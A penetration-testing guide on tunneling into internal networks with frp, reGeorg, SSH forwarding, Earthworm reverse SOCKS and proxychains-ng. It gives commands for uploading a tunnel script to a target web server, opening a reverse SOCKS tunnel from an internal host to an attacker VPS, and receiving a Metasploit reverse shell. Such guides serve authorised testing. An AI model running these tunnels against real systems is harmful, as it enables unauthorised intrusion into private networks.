Mastering Internal Network Tunneling: frp, reGeorg, SSH & Earthworm Techniques

During penetration testing it is common to encounter targets that reside in an internal network or are otherwise unreachable directly. This guide presents several practical traffic‑proxy and port‑forwarding methods that allow an attacker to tunnel traffic into the target's internal network.

frp Port Forwarding

frp is a high‑performance reverse proxy that supports TCP and UDP and can expose internal services to the public internet.

Download the binary package:

wget https://github.com/fatedier/frp/releases/download/v0.32.0/frp_0.32.0_linux_amd64.tar.gz

Extract the archive: tar zxf frp_0.32.0_linux_amd64.tar.gz Enter the directory: cd frp_0.32.0_linux_amd64/ Configure the client ( frpc.ini) with server_addr set to the public IP and server_port to the port used for communication (e.g., 1234). Configure the server ( frps.ini) with the same server_port.

Start the server and client:

./frps -c frps.ini

./frpc -c frpc.ini

After the tunnel is active, Metasploit can listen on the local forwarded port (e.g., 1234) and receive a reverse shell from the internal host.

reGeorg + Proxifier

reGeorg is an upgraded version of reDuh that forwards internal ports through an HTTP/HTTPS tunnel. It consists of a server component (PHP/ASPX/JSP/Node.js) and a Python client that provides a SOCKS proxy.

Typical workflow:

Upload tunnel.nosocket.php to a web‑accessible directory on the target.

Run the client on the attacker machine:

python reGeorgSocksProxy.py -p 8888 -u http://192.168.114.129/tunnel.nosocket.php

Configure Proxifier to use the SOCKS5 proxy at 192.168.114.129:80 and set rule‑based routing so that only desired applications (e.g., browsers) use the proxy while others run direct.

Ensure python.exe is set to direct mode to avoid a proxy loop.

Once configured, internal web services become reachable through the proxy.

SSH Port Forwarding

Common SSH tunnel options:

-C  Enable compression
-f  Run in background
-N  No remote command (silent connection)
-g  Allow remote hosts to connect to local forwarded ports
-L  Local port forwarding
-R  Remote port forwarding
-D  Dynamic (SOCKS) forwarding
-P  Specify remote SSH port

Example of remote dynamic forwarding to create a SOCKS proxy: ssh -CfNg -D 1111 [email protected] -P 44866 This command opens a local SOCKS4/5 proxy on port 1111 that forwards traffic through the remote SSH server to the internal target.

Earthworm (ew) Tool

Earthworm provides both forward and reverse SOCKS5 proxy capabilities for a wide range of platforms.

Forward SOCKS5 server (public IP available): ew.exe -s ssocksd -l 888 Reverse SOCKS5 server (no public IP on target):

# On attacker VPS
./ew -s rcsocks -l 1260 -e 1261
# On internal target
ew.exe -s rssocks -d <em>VPS_IP</em> -e 1261

After the reverse tunnel is established, configure a local proxy client (e.g., SocksCap64) to use 127.0.0.1:1260. Browsers or other tools can then access internal services through this proxy.

proxychains‑ng Integration

proxychains‑ng can chain the SOCKS proxy with other tools such as nmap.

Installation (sourceforge):

./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config

Configure /etc/proxychains.conf: socks5 148.xx.xx.xx 1260 Test the tunnel; successful output shows the internal web page content.

These techniques together provide a flexible toolbox for penetrating internal networks, allowing attackers to forward ports, establish SOCKS proxies, and route traffic through encrypted tunnels.